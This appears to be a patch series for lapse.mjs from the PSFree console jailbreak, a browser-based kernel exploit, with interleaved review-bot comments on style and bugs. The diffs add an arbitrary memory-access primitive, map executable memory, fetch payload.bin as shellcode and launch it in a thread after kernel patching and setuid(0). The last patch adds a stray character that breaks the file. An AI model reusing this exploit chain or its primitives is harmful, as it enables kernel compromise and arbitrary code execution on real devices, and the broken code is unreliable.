From af6ce04ba37314c4d53ef6ec73b10dc96ecd7ca6 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:02:47 +0200
Subject: [PATCH 1/6] Update lapse.mjs

---
 lapse.mjs | 80 ++++++++++++++++++++++++++++++++++---------------------
 1 file changed, 49 insertions(+), 31 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 39441a0..b2d98e8 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1625,20 +1625,6 @@ function setup(block_fd) {
 }
 aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
- {
- const reqs1 = make_reqs1(1);
- const timo = new Word(1);
- const id = new Word();
- aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
- chain.do_syscall_clear_errno(
- 'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
- const err = chain.errno;
- if (err !== 60) { // ETIMEDOUT
- die(`SceAIO system not blocked. errno: ${err}`);
- }
- free_aios(id.addr, 1);
- }
-
 log('heap grooming');
 // chosen to maximize the number of 0x80 malloc allocs per submission
 const num_reqs = 3;
@@ -1715,7 +1701,7 @@ export async function kexploit() {
 }
 // If setuid is successful, we dont need to run the kexploit again
- try {
+ try {
 if (sysi('setuid', 0) == 0) {
 log("Not running kexploit again.");
 runBinLoader();
@@ -1723,7 +1709,7 @@ export async function kexploit() {
 }
 }
 catch (e) {}
-
+
 // fun fact:
 // if the first thing you do since boot is run the web browser, WebKit can
 // use all the cores
@@ -1815,28 +1801,60 @@ function malloc32(sz) {
 ptr.backing = new Uint32Array(backing.buffer);
 return ptr;
 }
-
+function array_from_address(addr, size) {
+var og_array = new Uint32Array(0x1000);
+var og_array_i = mem.addrof(og_array).add(0x10);
+mem.write64(og_array_i, addr);
+mem.write32(og_array_i.add(0x8), size);
+mem.write32(og_array_i.add(0xC), 0x1);
+nogc.push(og_array);
+return og_array;
+}
 kexploit().then(() => {
-
- window.pld_size = new Int(0x26200000, 0x9);
- var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
- var payload = window.pld;
- var bufLen = payload.length * 4
- var payload_loader = malloc32(bufLen);
- var loader_writer = payload_loader.backing;
- for (var i = 0; i < payload.length; i++) {
- loader_writer[i] = payload[i];
- }
- chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
- var pthread = malloc(0x10);
+ const PROT_READ = 1;
+ const PROT_WRITE = 2;
+ const PROT_EXEC = 4;
+var loader_addr = chain.sysp(
+ 'mmap',
+ new Int(0, 0),
+ 0x1000,
+ PROT_READ | PROT_WRITE | PROT_EXEC,
+ 0x41000,
+ -1,
+ 0
+);
+
+ var tmpStubArray = array_from_address(loader_addr, 1);
+ tmpStubArray[0] = 0x00C3E7FF;
+
+ var req = new XMLHttpRequest();
+ req.responseType = "arraybuffer";
+ req.open('GET','payload.bin');
+ req.send();
+ req.onreadystatechange = function () {
+ if (req.readyState == 4) {
+ var PLD = req.response;
+ var payload_buffer = chain.sysp('mmap', 0, 0x300000, 7, 0x41000, -1, 0);
+ var pl = array_from_address(payload_buffer, PLD.byteLength*4);
+ var padding = new Uint8Array(4 - (req.response.byteLength % 4) % 4);
+ var tmp = new Uint8Array(req.response.byteLength + padding.byteLength);
+ tmp.set(new Uint8Array(req.response), 0);
+ tmp.set(padding, req.response.byteLength);
+ var shellcode = new Uint32Array(tmp.buffer);
+ pl.set(shellcode,0);
+ var pthread = malloc(0x10);
+
 call_nze(
 'pthread_create',
 pthread,
 0,
- payload_loader,
+ loader_addr,
 payload_buffer,
- );
+ );
+ }
+ };
+ })
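Review bot: The padding length inside the `readyState == 4` handler has a precedence slip: `4 - (req.response.byteLength % 4) % 4` parses as `4 - ((byteLength % 4) % 4)`, so a response whose length is already a multiple of 4 gets 4 bytes of padding instead of 0; the intended expression is `var padding = new Uint8Array((4 - req.response.byteLength % 4) % 4);`. The handler also runs for every terminal state, including a 404 or a network failure where `req.response` is null, and then throws on `PLD.byteLength`; guard it with `if (req.readyState == 4 && req.status == 200)` or check `req.response` before using it. Assigning `req.onreadystatechange` after `req.send()` works in practice but reads backwards; set the handler before sending. The `kexploit().then(...)` callback appears to continue past the end of the hunk, so its closing lines are not visible here.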
From cb7393d3d5da940fe629664f945049251ec57142 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:03:46 +0200
Subject: [PATCH 2/6] Delete payload.js

---
 payload.js | 10 ----------
 1 file changed, 10 deletions(-)
 delete mode 100644 payload.js

diff --git a/payload.js b/payload.js
deleted file mode 100644
index f6a82e5..0000000
--- a/payload.js
+++ /dev/null
@@ -1,10 +0,0 @@
-if (sessionStorage.getItem('jbsuccess')) {
- sessionStorage.setItem('binloader', 1);
-} else {
- fetch('./payload.bin').then(res => {
- res.arrayBuffer().then(arr => {
- window.pld = new Uint32Array(arr);
- sessionStorage.setItem('jbsuccess', 1);
- })
- })
-}

From 9b113eb502855668f418b3742c63806b4e49eee7 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:04:20 +0200
Subject: [PATCH 3/6] Update lapse.mjs

---
 lapse.mjs | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lapse.mjs b/lapse.mjs
index b2d98e8..4309b35 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1603,6 +1603,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
 kmem.write64(sysent_661.add(8), sy_call);
 // .sy_thrcnt = SY_THR_STATIC
 kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
+ sessionStorage.setItem('jbsuccess', 1);
 alert("kernel exploit succeeded!");
 }

From 9f4bbe4370590175f6734d53afd23643edf4d23c Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:04:38 +0200
Subject: [PATCH 4/6] Update index.html

---
 index.html | 1 -
 1 file changed, 1 deletion(-)

diff --git a/index.html b/index.html
index 3ca4a11..e392d93 100644
--- a/index.html
+++ b/index.html
@@ -43,6 +43,5 @@ along with this program. If not, see . source code and license.

     
-    
     
 

From fdf620ddd8077c4991843eb761dcdf9b086de212 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 20:10:56 +0200
Subject: [PATCH 5/6] Update lapse.mjs

Modify bin loader
---
 lapse.mjs | 37 +++++++++++++++++++------------------
 1 file changed, 19 insertions(+), 18 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 4309b35..7f571eb 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1603,8 +1603,9 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     kmem.write64(sysent_661.add(8), sy_call);
     // .sy_thrcnt = SY_THR_STATIC
     kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
-    sessionStorage.setItem('jbsuccess', 1);
-    alert("kernel exploit succeeded!");
+    localStorage.ExploitLoaded="yes"
+    sessionStorage.ExploitLoaded="yes";
+   //alert("kernel exploit succeeded!");
 }
 
 
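Review bot: The new line `localStorage.ExploitLoaded="yes"` drops the statement terminator and switches from the `setItem` API that the replaced line used to bare property assignment on the storage object; the two lines would read consistently as `localStorage.setItem('ExploitLoaded', 'yes');` and `sessionStorage.setItem('ExploitLoaded', 'yes');`. The `alert` is commented out rather than deleted, which leaves dead code in the function body — remove the line, since version control keeps it. The commented line is also indented with 3 spaces where the rest of the block uses 4. patch_kernel's body begins outside the hunk.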
@@ -1696,20 +1697,20 @@ export async function kexploit() {
     await init();
     const _init_t2 = performance.now();
 
-    if(sessionStorage.getItem('binloader')){
-        runBinLoader();
-        return new Promise(() => {});
-    }
+   if (localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes") {
+           runBinLoader();
+            return new Promise(() => {});
+      }
+
 
     // If setuid is successful, we dont need to run the kexploit again
      try {
-        if (sysi('setuid', 0) == 0) {
-            log("Not running kexploit again.");
-            runBinLoader();
-            return;
+        chain.sys('setuid', 0);
         }
     }
-    catch (e) {}
+    catch (e) {
+        localStorage.ExploitLoaded = "no";
+    }
  
     // fun fact:
     // if the first thing you do since boot is run the web browser, WebKit can
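Review bot: The early return added at the top of the hunk trusts a persistent `localStorage` flag as proof that the kernel is already patched, but the flag outlives the state it records — `localStorage` survives a browser restart and a reboot while `sessionStorage` is per session — so in a fresh session `localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes"` holds even when nothing has been patched, and `runBinLoader()` is reached on that stale signal. The new `catch` that writes `localStorage.ExploitLoaded = "no"` cannot correct this, because it sits after the `return` and only runs if `chain.sys('setuid', 0)` throws, which a failed syscall may not do; the replaced code instead compared the result (`sysi('setuid', 0) == 0`) before deciding, and that ordering — verify at runtime first, then consult the flag — is the one to keep. The new `if` block is also indented with 3, 11, 12 and 6 spaces against the surrounding 4-space style. kexploit's body starts and ends outside the hunk.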
@@ -1803,13 +1804,13 @@ function malloc32(sz) {
     return ptr;
 }
 function array_from_address(addr, size) {
-var og_array = new Uint32Array(0x1000);
-var og_array_i = mem.addrof(og_array).add(0x10);
-mem.write64(og_array_i, addr);
-mem.write32(og_array_i.add(0x8), size);
-mem.write32(og_array_i.add(0xC), 0x1);
-nogc.push(og_array);
-return og_array;
+   var og_array = new Uint32Array(0x1000);
+    var og_array_i = mem.addrof(og_array).add(0x10);
+    mem.write64(og_array_i, addr);
+    mem.write32(og_array_i.add(0x8), size);
+    mem.write32(og_array_i.add(0xC), 0x1);
+    nogc.push(og_array);
+    return og_array;
 }
 
 kexploit().then(() => {

From a11c98438bba8cf5c9670d822ca83c0b2de6d2d2 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 20:15:14 +0200
Subject: [PATCH 6/6] Update lapse.mjs

---
 lapse.mjs | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 7f571eb..03d4ef3 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2025 anonymous
+F/* Copyright (C) 2025 anonymous
 This file is part of PSFree.
 
 PSFree is free software: you can redistribute it and/or modify
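Review bot: The changed first line `+F/* Copyright (C) 2025 anonymous` introduces a stray `F` before the license comment; the parser skips the comment, so the module now begins with a bare identifier expression and evaluation fails (a `ReferenceError` on the undefined `F`, or a `SyntaxError` depending on the token that follows the comment) before any of the file runs. Restore the line to `/* Copyright (C) 2025 anonymous`. This looks like an accidental keystroke rather than an intended change and should be dropped from the series.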
@@ -1702,8 +1702,6 @@ export async function kexploit() {
             return new Promise(() => {});
       }
 
-
-    // If setuid is successful, we dont need to run the kexploit again
      try {
         chain.sys('setuid', 0);
         }